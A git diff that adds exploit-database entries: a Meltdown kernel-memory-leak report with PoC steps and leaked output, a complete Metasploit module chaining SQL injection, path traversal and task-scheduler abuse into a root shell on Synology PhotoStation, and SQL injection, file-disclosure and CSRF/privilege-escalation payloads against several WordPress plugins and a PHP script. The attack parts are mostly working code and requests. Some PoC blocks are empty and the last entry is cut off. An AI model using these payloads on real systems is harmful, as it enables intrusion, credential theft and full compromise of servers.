diff --git a/exploits/hardware/dos/43490.txt b/exploits/hardware/dos/43490.txt
new file mode 100644
index 000000000..667812ade
--- /dev/null
+++ b/exploits/hardware/dos/43490.txt
@@ -0,0 +1,146 @@
+== INTRODUCTION ==
+This is a bug report about a CPU security issue that affects
+processors by Intel, AMD and (to some extent) ARM.
+
+I have written a PoC for this issue that, when executed in userspace
+on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
+can leak around 2000 bytes per second from Linux kernel memory after a
+~4-second startup, in a 4GiB address space window, with the ability to
+read from random offsets in that window. The same thing also works on
+an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
+
+On the Intel CPU, I also have preliminary results that suggest that it
+may be possible to leak host memory (which would include memory owned
+by other guests) from inside a KVM guest.
+
+The attack doesn't seem to work as well on ARM - perhaps because ARM
+CPUs don't perform as much speculative execution because of a
+different performance-energy-tradeoff or so?
+
+All PoCs are written against specific processors and will likely
+require at least some adjustments before they can run in other
+environments, e.g. because of hardcoded timing tresholds.
+
+############################################################
+
+On the following Intel CPUs (the only ones tested so far), we managed
+to leak information using another variant of this issue ("variant 3").
+So far, we have not managed to leak information this way on AMD or ARM CPUs.
+
+ - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
+ - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)
+
+Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
+speculative execution have something like the following behavior:
+
+ - If the address is not mapped (perhaps also under other
+ conditions?), instructions that depend on the load are not executed.
+ - If the address is mapped, but not sufficiently cached, the load loads zeroes.
+ Instructions that depend on the load are executed.
+ Perhaps Intel decided that in case of a sufficiently high-latency load,
+ it makes sense to speculate ahead with a dummy value to get a chance to
+ prefetch cachelines for dependent loads, or something like that?
+ - If the address is sufficiently cached, the load loads the data stored at the
+ given address, without respecting the privilege level.
+ Instructions that depend on the load are executed.
+ This is the vulnerable case.
+
+
+I have attached a PoC that works on both tested Intel systems, named
+intel_kernel_read_poc.tar. Usage:
+
+As root, determine where the core_pattern is in the kernel:
+
+=====
+# grep core_pattern /proc/kallsyms
+ffffffff81e8aea0 D core_pattern
+=====
+
+Then, as a normal user, unpack the PoC and use it to leak the
+core_pattern (and potentially other cached things around it) from
+kernel memory, using the pointer from the previous step:
+
+=====
+$ cat /proc/sys/kernel/core_pattern
+/cores/%E.%p.%s.%t
+$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
+ffffffff81e8aea0 2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e
+|/cores/%E.%p.%s.|
+ffffffff81e8aeb0 25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20
+|%t.apport %p %s |
+ffffffff81e8aec0 25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00 |%c
+%P...........|
+[ zeroes ]
+ffffffff81e8af20 c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
+|................|
+ffffffff81e8af30 20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff |
+.......u.......|
+[ zeroes ]
+ffffffff81e8bb60 65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00
+|e[..............|
+ffffffff81e8bb70 00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00
+|....mA..........|
+[ zeroes ]
+
+real 0m13.726s
+user 0m9.820s
+sys 0m3.908s
+=====
+
+As you can see, the core_pattern, part of the previous core_pattern (behind the
+first nullbyte) and a few kernel pointers were leaked.
+
+To confirm whether other leaked kernel data was leaked correctly, use gdb as
+root to read kernel memory:
+
+=====
+# gdb /bin/sleep /proc/kcore
+[...]
+(gdb) x/4gx 0xffffffff81e8af20
+0xffffffff81e8af20: 0xffffffff81e8a4c0 0xffffffff81e8afc0
+0xffffffff81e8af30: 0xffffffff81f08e20 0xffffffff81cdd975
+(gdb) x/4gx 0xffffffff81e8bb60
+0xffffffff81e8bb60: 0xffffffff81cf5b65 0x0000000000000000
+0xffffffff81e8bb70: 0x0000416d00000000 0x0000000000000000
+=====
+
+Note that the PoC will report uncached bytes as zeroes.
+
+
+To Intel:
+Please tell me if you have trouble reproducing this issue.
+Given how different my two test machines are, I would be surprised if this
+didn't just work out of the box on other CPUs from the same generation.
+This PoC doesn't have hardcoded timings or anything like that.
+
+We have not yet tested whether this still works after a TLB flush.
+
+
+Regarding possible mitigations:
+
+A short while ago, Daniel Gruss presented KAISER:
+https://gruss.cc/files/kaiser.pdf
+https://lkml.org/lkml/2017/5/4/220 (cached:
+https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
+)
+https://github.com/IAIK/KAISER
+
+Basically, the issue that KAISER tries to mitigate is that on Intel
+CPUs, the timing of a pagefault reveals whether the address is
+unmapped or mapped as kernel-only (because for an unmapped address, a
+pagetable walk has to occur while for a mapped address, the TLB can be
+used). KAISER duplicates the top-level pagetables of all processes and
+switches them on kernel entry and exit. The kernel's top-level
+pagetable looks as before. In the top-level pagetable used while
+executing userspace code, most entries that are only used by the
+kernel are zeroed out, except for the kernel text and stack that are
+necessary to execute the syscall/exception entry code that has to
+switch back the pagetable.
+
+I suspect that this approach might also be usable for mitigating
+variant 3, but I don't know how much TLB flushing / data cache
+flushing would be necessary to make it work.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43490.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/43474.rb b/exploits/php/webapps/43474.rb
new file mode 100755
index 000000000..cfb55a80c
--- /dev/null
+++ b/exploits/php/webapps/43474.rb
@@ -0,0 +1,365 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Synology PhotoStation Multiple Vulnerabilities",
+ 'Description' => %q{
+ This module exploits multiple vulnerabilities in Synology PhotoStation.
+ When combined these issues can be leveraged to gain a remote root shell.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'James Bercegay',
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://gulftech.org/' ]
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [ ['Automatic', {}] ],
+ 'DisclosureDate' => '2018-01-08',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('DSMPORT', [ true, "The default DSM port", '5000']),
+ ])
+ end
+
+ def check
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; SELECT user; -- "
+ },
+ })
+
+ if res and res.body =~ /PhotoStation/
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+
+ rnum = rand(1000)
+ rstr = Rex::Text.rand_text_alpha(10)
+
+ uuid = rnum # User ID
+ upwd = rstr # User Password
+ uusr = rstr # User name
+
+ vol1 = '/volume1'
+ audb = '/usr/syno/etc/private/session/current.users'
+
+###########################################################################
+# STEP 00: Force PhotoStation to NOT use DSM for the authentication system
+###########################################################################
+
+ print_status("Switching authentication system to PhotoStation via SQL Injection")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; UPDATE photo_config SET config_value=0 WHERE config_key='account_system'; -- "
+ },
+ })
+
+###########################################################################
+# STEP 01: Create an admin user
+###########################################################################
+
+ print_status("Creating admin user: #{uusr} => #{upwd}")
+
+ # Password hash
+ umd5 = Rex::Text.md5(upwd)
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; INSERT INTO photo_user (userid, username, password, admin) VALUES (#{uuid}, '#{uusr}', '#{umd5}', TRUE); -- "
+ },
+ })
+
+###########################################################################
+# STEP 02: Authenticate and store session identifier
+###########################################################################
+
+ print_status("Authenticating as admin user: #{uusr}")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/webapi/auth.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'api' =>'SYNO.PhotoStation.Auth',
+ 'method' => 'login',
+ 'version' =>'1',
+ 'username' => uusr,
+ 'password' => upwd,
+ 'enable_syno_token' => 'TRUE',
+
+ },
+ })
+
+ if not res or not res.headers or not res.headers['Set-Cookie']
+ print_error("Unable to retrieve session identifier! Aborting ...")
+ return
+ end
+
+ uckv = res.headers['Set-Cookie']
+ psid = /PHPSESSID=([a-z0-9]+);/.match(uckv)[1]
+
+ print_status("Got PHP Session ID: #{psid}")
+
+###########################################################################
+# STEP 03: Delete any existing path names used from the database
+###########################################################################
+
+ print_status("Making sure there are no duplicate path index conflicts ...")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; DELETE FROM video WHERE path='#{audb}'; -- "
+ },
+ })
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; DELETE FROM video WHERE path='#{vol1}/photo///current.users'; -- "
+ },
+ })
+
+###########################################################################
+# STEP 04: Create a record for our malicious path in the database
+###########################################################################
+
+ print_status("Creating video record with bad 'path' data via SQL injection")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; INSERT INTO video (id, path, title, container_type) VALUES (#{rnum}, '#{audb}', '#{rstr}', '#{rstr}'); -- "
+ },
+ })
+
+###########################################################################
+# STEP 05: Copy session database as root, to the web directory for reading
+###########################################################################
+
+ print_status("Making a copy of the session db as root via synophotoio")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/photo/album_util.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'copy_items',
+ 'destination' => '2f',
+ 'video_list' => rnum
+ },
+ 'cookie' => uckv
+ })
+
+###########################################################################
+# STEP 06: Move the session db copy to the web root for retrieval
+###########################################################################
+
+ print_status("Moving session db to webroot for retrieval")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/file_upload.php',
+ 'method' => 'POST',
+ 'vars_get' =>
+ {
+ # /../@appstore/PhotoStation/photo/
+ 'dir' =>'2f2e2e2f4061707073746f72652f50686f746f53746174696f6e2f70686f746f2f',
+ 'name' => "2f",
+ 'fname' => "#{rstr}",
+ 'sid' => "#{psid}",
+ 'action' => 'aviary_add',
+ },
+ 'vars_post' =>
+ {
+ 'url' => 'file://' + vol1 + '/photo/current.users'
+ },
+ 'cookie' => uckv
+ })
+
+###########################################################################
+# STEP 07: Retrieve and read the session db
+###########################################################################
+
+ print_status("Attempting to read session db")
+
+ res = send_request_cgi(
+ {
+ 'uri' => "/photo/#{rstr}.jpg",
+ 'method' => 'GET'
+ })
+
+ if not res or not res.body
+ print_error("Unable to retrieve session file! Aborting ...")
+ return
+ end
+
+ host = /"host": "([^"]+)"/.match(res.body)[1]
+ sess = /"id": "([^"]+)"/.match(res.body)[1]
+ syno = /"synotoken": "([^"]+)"/.match(res.body)[1]
+
+ print_status("Extracted admin session: #{sess} @ #{host}")
+
+###########################################################################
+# STEP 08: Registering files for cleanup
+###########################################################################
+
+ # Uncomment for cleanup functionality
+ # register_files_for_cleanup("#{vol1}/photo/current.users")
+ # register_files_for_cleanup("#{vol1}/@appstore/PhotoStation/photo/#{rstr}.jpg")
+
+###########################################################################
+# STEP 09: Create a task containing our payload
+###########################################################################
+
+ print_status("Creating privileged task to run as root")
+
+ # Switch to DSM port from here on out
+ datastore['RPORT'] = datastore['DSMPORT']
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/webapi/entry.cgi',
+ 'headers' =>
+ {
+ 'X-SYNO-TOKEN' => syno,
+ 'Client-IP' => host
+ },
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'name' => '"whatevs"',
+ 'owner' => '"root"',
+ 'enable' => 'true',
+ 'schedule' =>'{"date_type":0,"week_day":"0,1,2,3,4,5,6","hour":0,"minute":0,"repeat_hour":0,"repeat_min":0,"last_work_hour":0,"repeat_min_store_config":[1,5,10,15,20,30],"repeat_hour_store_config":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]}',
+ 'extra' => '{"notify_enable":false,"script":"' + payload.encoded.gsub(/"/,'\"') + '","notify_mail":"","notify_if_error":false}',
+ 'type' => '"script"',
+ 'api' => 'SYNO.Core.TaskScheduler',
+ 'method' => 'create',
+ 'version' => '2',
+
+ },
+ 'cookie' => "id=#{sess}"
+ })
+
+ if not res or not res.body
+ print_error("Unable to create task! Aborting ...")
+ return
+ end
+
+ task = /{"id"\d+)},"success":true}/.match(res.body)[1]
+
+ print_status("Task created successfully: ID => #{task}")
+
+###########################################################################
+# STEP 10: Execute the selected payload
+###########################################################################
+
+ print_status("Running selected task as root. Get ready for shell!")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/webapi/entry.cgi',
+ 'headers' =>
+ {
+ 'X-SYNO-TOKEN' => syno,
+ 'Client-IP' => host
+ },
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'stop_when_error' => 'false',
+ 'mode' => '"sequential"',
+ 'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"run","version":1,"task":[' + task + ']}]',
+ 'api' => 'SYNO.Entry.Request',
+ 'method' => 'request',
+ 'version' => '1'
+ },
+ 'cookie' => "id=#{sess}"
+ })
+
+###########################################################################
+# STEP 11: Delete payload task from scheduler
+###########################################################################
+
+ print_status("Deleting malicious task from task scheduler")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/webapi/entry.cgi',
+ 'headers' =>
+ {
+ 'X-SYNO-TOKEN' => syno,
+ 'Client-IP' => host
+ },
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'stop_when_error' => 'false',
+ 'mode' => '"sequential"',
+ 'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"delete","version":1,"task":[' + task + ']}]',
+ 'api' => 'SYNO.Entry.Request',
+ 'method' => 'request',
+ 'version' => '1'
+ },
+ 'cookie' => "id=#{sess}"
+ })
+
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/43475.txt b/exploits/php/webapps/43475.txt
new file mode 100644
index 000000000..90ccf531d
--- /dev/null
+++ b/exploits/php/webapps/43475.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
+# Google Dork: N/A
+# Date: 09/01/2018 (GMT+7)
+# Exploit Author: telahdihapus
+# Vendor Homepage: https://themeforest.net/user/aonetheme
+# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
+# Tested on: windows 10
+
+1. description :
+unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file
+
+2. POC :
+http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
+
+3. timeline
+- jan 1, 2018 report vendor
+- jan 1, 2018 vendor send email
+- jan 1, 2018 send poc
+- jan 2, 2018 vendor contact team
+- jan 8, 2018 vendor send email about fixed issue
+
+4. solution :
+update to version 3.2
\ No newline at end of file
diff --git a/exploits/php/webapps/43477.txt b/exploits/php/webapps/43477.txt
new file mode 100644
index 000000000..911313f2d
--- /dev/null
+++ b/exploits/php/webapps/43477.txt
@@ -0,0 +1,148 @@
+# Exploit Title: Muviko 1.1 - Multiple SQL Injection
+# Exploit Author: Ahmad Mahfouz
+# Contact: http://twitter.com/eln1x
+# Date: 09/01/2018
+# CVE: CVE-2017-17970
+# Vendor Homepage: https://www.muvikoscript.com
+# Version: 1.1
+# Tested on: Mac OS
+
+
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection: login.php form parameter [POST] email
+
+
+
+POST /login.php HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+Upgrade-Insecure-Requests: 1
+
+Content-Type: application/x-www-form-urlencoded
+
+Content-Length: 45
+
+
+
+email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2b'&password=admxn&login=
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection: load_season.php form parameter [GET] season_id
+
+
+
+GET /themes/flixer/ajax/load_season.php?season_id=-19'+union+all+select+1,2,3,4,5,6,7,8,9--+-&season_number=1 HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+
+
+# SQL Injection get_raring.php parameter [GET] movie_id
+
+
+
+GET /themes/flixer/ajax/get_rating.php?movie_id=9'+AND+SLEEP(5)+AND+'AAA'='AAA HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection update_rating.php parameters [GET] rating,movie_id
+
+
+
+GET /themes/flixer/ajax/update_rating.php?movie_id=[SQL]&rating=[SQL] HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection set_player_source.php parameters [GET] id
+
+GET /themes/flixer/ajax/set_player_source.php?id=[SQL]&is_series=1&is_embed=0 HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/43479.txt b/exploits/php/webapps/43479.txt
new file mode 100644
index 000000000..58909fae3
--- /dev/null
+++ b/exploits/php/webapps/43479.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Wichipi Events Calendar - SQL Injection
+# Date: 09-01-2018
+# Exploit Author: Dennis Veninga
+# Contact Author: d.veninga [at] networking4all.com
+# Vendor Homepage: codecanyon.net/user/wachipi
+# Version: 1.0
+# CVE-ID: CVE-2018-5315
+
+Events Calendar allows you to easily add to your website a powerful
+interactive calendar to present your events.
+
+Found 09-01-18
+Vendor reply & fix 09-01-2018
+
+The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
+via the event_id parameter to event.php.
+
+NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.
+
+[Additional Information]
+http://
+{TARGET}/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
+
+[Vulnerability Type]
+SQL Injection
+
+[Vendor of Product]
+https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi
+
+[Affected Product Code Base]
+Events Calendar - 1.0
+
+[Affected Component]
+events.php
+
+[Attack Type]
+Remote
+
+[Impact Code execution]
+true
+
+[Impact Escalation of Privileges]
+true
+
+[Impact Information Disclosure]
+true
+
+[Attack Vectors]
+To exploit, union select 29 columns. User can use 2 or 25 for information
+gathering.
+
+[Discoverer]
+Dennis Veninga @ Networking4all.com
\ No newline at end of file
diff --git a/exploits/php/webapps/43484.txt b/exploits/php/webapps/43484.txt
new file mode 100644
index 000000000..5764c034a
--- /dev/null
+++ b/exploits/php/webapps/43484.txt
@@ -0,0 +1,74 @@
+* Exploit Title: Social Media Widget by Acurax [CSRF]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://www.acurax.com/
+* Software Link: https://wordpress.org/plugins/acurax-social-media-widget
+* Version: 3.2.5
+* Tested on: WordPress 4.9.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements AJAX action `acx_asmw_saveorder` which calls back the
+function `acx_asmw_saveorder_callback`. The later does not implement any
+anti-CSRF controls thus allowing a malicious actor to perform an attack
+that could update plugin specific option `social_widget_icon_array_order`.
+
+Vulnerable param is `$_POST['recordsArray']` and it is saved as an
+option with the name `social_widget_icon_array_order`.
+
+Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will
+be served when a user with the right privileges visits plugin's settings
+page (`wp-admin/admin.php?page=Acurax-Social-Widget-Settings`).
+
+Vulnerable code is located in file
+`acurax-social-media-widget/function.php` line 993:
+
+```
+function acx_asmw_saveorder_callback() {
+ global $wpdb;
+ $social_widget_icon_array_order = $_POST['recordsArray'];
+ if ( current_user_can( 'manage_options' ) ) {
+ $social_widget_icon_array_order = serialize(
+$social_widget_icon_array_order );
+ update_option( 'social_widget_icon_array_order',
+$social_widget_icon_array_order );
+ echo "";
+ echo "Social Media Icon's Order Saved";
+ echo "
";
+ }
+ die(); // this is required to return a proper result
+}
+
+add_action( 'wp_ajax_acx_asmw_saveorder', 'acx_asmw_saveorder_callback' );
+
+```
+
+PoC
+---
+
+In this PoC we leverage the CSRF vulnerabilityt o perform a Persistent
+XSS attack. The payload is available in plugin's settings.
+
+```
+
+
+```
+
+Timeline
+--------
+
+1. **2017-12-12**: Discovered
+2. **2017-12-12**: Tried to contact plugin's vendor through the contact
+form on their website
+3. **2017-12-12**: Vendor replied
+4. **2017-12-12**: Vendor Received Details
+5. **2018-01-02**: Patch released
\ No newline at end of file
diff --git a/exploits/php/webapps/43485.txt b/exploits/php/webapps/43485.txt
new file mode 100644
index 000000000..24997d419
--- /dev/null
+++ b/exploits/php/webapps/43485.txt
@@ -0,0 +1,109 @@
+* Exploit Title: CMS Tree Page View [CSRF, Privilege Escalation]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://eskapism.se/
+* Software Link: https://wordpress.org/plugins/cms-tree-page-view
+* Version: 1.4
+* Tested on: WordPress 4.8.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements AJAX action `cms_tpv_add_page` which calls back the
+function `cms_tpv_add_page`. The later does not implement any anti-CSRF
+controls or security checks.
+
+Leveraging a CSRF attack an attacker could perform a Persistent XSS
+attack if the victim has administrative rights (see PoC).
+
+The AJAX action is a privileged one so it's only available for
+registered users. Even so it doesn't implement any capabilities checks
+so it's available to all users no matter the access level. This could
+allow any registered user to create arbitrary posts no matter the access
+level.
+
+PoC
+---
+
+### CSRF -> Persistent XSS
+
+In this PoC we exploit the `$_POST["page_titles"]` param to perform a
+Persistent XSS attack.
+
+```
+
+
+```
+
+### Create Arbitrary Posts
+
+In this PoC we use a user with subscriber access to create arbitrary
+pages. The post\_type is user defined so in the same manner we could
+create any post type.
+
+```
+#!/usr/bin/env php
+
+ * @date 2017-08-09
+ ******************************************************************************/
+
+require_once __DIR__ . '/vendor/autoload.php';
+
+use Wordfence\ExKit\Cli;
+use Wordfence\ExKit\Config;
+use Wordfence\ExKit\Endpoint;
+use Wordfence\ExKit\ExitCodes;
+use Wordfence\ExKit\WPAuthentication;
+
+Config::get( 'url.base', null, true, 'Enter the site URL' )
+|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
+
+$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
+
+Cli::writeInfo( 'Logging in as subscriber...' );
+
+WPAuthentication::logInAsUserRole( $s,
+WPAuthentication::USER_ROLE_SUBSCRIBER );
+
+Cli::writeInfo( 'Sending payload...' );
+
+$postData = [
+ 'action' => 'cms_tpv_add_page',
+ 'type' => 'after',
+ 'pageID' => '1',
+ 'post_type' => 'page',
+ 'page_title' => date('Y-m-d H:i:s'),
+];
+
+$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
+
+if(!$r->success || $r->body == '0'){
+ ExitCodes::exitWithFailed('Failed to retrieve a valid response');
+}
+
+ExitCodes::exitWithSuccess('Exploitation successful');
+
+```
+
+Timeline
+--------
+
+1. **2017-12-12**: Discovered
+2. **2017-12-23**: Vendor notified by email
+3. **2018-01-06**: Patch released
\ No newline at end of file
diff --git a/exploits/php/webapps/43486.txt b/exploits/php/webapps/43486.txt
new file mode 100644
index 000000000..10db3a002
--- /dev/null
+++ b/exploits/php/webapps/43486.txt
@@ -0,0 +1,117 @@
+* Exploit Title: Admin Menu Tree Page View [CSRF, Privilege Escalation]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://eskapism.se/
+* Software Link: https://wordpress.org/plugins/admin-menu-tree-page-view
+* Version: 2.6.9
+* Tested on: WordPress 4.9.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements AJAX action `admin_menu_tree_page_view_add_page` which
+calls back the function `admin_menu_tree_page_view_add_page`. The later
+does not implement any anti-CSRF controls or security checks.
+
+Leveraging a CSRF attack an attacker could perform a Persistent XSS
+attack if the victim has administrative rights (see PoC).
+
+The AJAX action is a privileged one so it's only available for
+registered users. Even so it doesn't implement any capabilities checks
+so it's available to all users no matter the access level. This could
+allow any registered user to create arbitrary posts no matter the access
+level.
+
+PoC
+---
+
+### CSRF -> Persistent XSS
+
+In this PoC we exploit the `$_POST["page_titles"]` param to perform a
+Persistent XSS attack.
+
+```
+
+
+```
+
+### Create Arbitrary Posts
+
+In this PoC we use a user with subscriber access to create arbitrary
+pages. The post\_type is user defined so in the same manner we could
+create any post type.
+
+```
+#!/usr/bin/env php
+
+ * @date 2017-08-09
+ ******************************************************************************/
+
+require_once __DIR__ . '/vendor/autoload.php';
+
+use Wordfence\ExKit\Cli;
+use Wordfence\ExKit\Config;
+use Wordfence\ExKit\Endpoint;
+use Wordfence\ExKit\ExitCodes;
+use Wordfence\ExKit\WPAuthentication;
+
+Config::get( 'url.base', null, true, 'Enter the site URL' )
+|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
+
+$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
+$s->XDebugOn();
+
+Cli::writeInfo( 'Logging in as subscriber...' );
+
+WPAuthentication::logInAsUserRole( $s,
+WPAuthentication::USER_ROLE_SUBSCRIBER );
+
+Cli::writeInfo( 'Sending payload...' );
+
+$postData = [
+ 'action' => 'admin_menu_tree_page_view_add_page',
+ 'type' => 'after',
+ 'pageID' => '1',
+ 'post_type' => 'page',
+ 'page_titles' => [ '' ],
+ 'post_status' => 'publish',
+];
+
+$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
+
+if(!$r->success || !$r->body == '0'){
+ ExitCodes::exitWithFailed('Failed to retrieve a valid response');
+}
+
+ExitCodes::exitWithSuccess('Exploitation successful');
+
+```
+
+Timeline
+--------
+
+1. **2017-12-12**: Discovered
+2. **2017-12-12**: Tried to contact plugin author through WordPress.org
+support threads
+3. **2017-12-13**: Tried to contact plugin author by creating an issue
+in plugin's repository on Github
+4. **2017-12-13**: Vendor replied
+5. **2017-12-14**: Vendor received details
+6. **2018-01-07**: Patch released
\ No newline at end of file
diff --git a/exploits/php/webapps/43487.txt b/exploits/php/webapps/43487.txt
new file mode 100644
index 000000000..f978feca8
--- /dev/null
+++ b/exploits/php/webapps/43487.txt
@@ -0,0 +1,57 @@
+* Exploit Title: WordPress Download Manager [CSRF]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: https://www.wpdownloadmanager.com/
+* Software Link: https://wordpress.org/plugins/download-manager
+* Version: 2.9.60
+* Tested on: WordPress 4.9.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements the AJAX action `wpdm-install-addon` which calls the
+function `wpdm_install_addon`. This function doesn't take any anti-CSRF
+measures thus making it susceptible to those kind of attacks.
+
+What is interesting about this function though, is the fact that it
+provides plugin installation functionality for admin users. The origin of
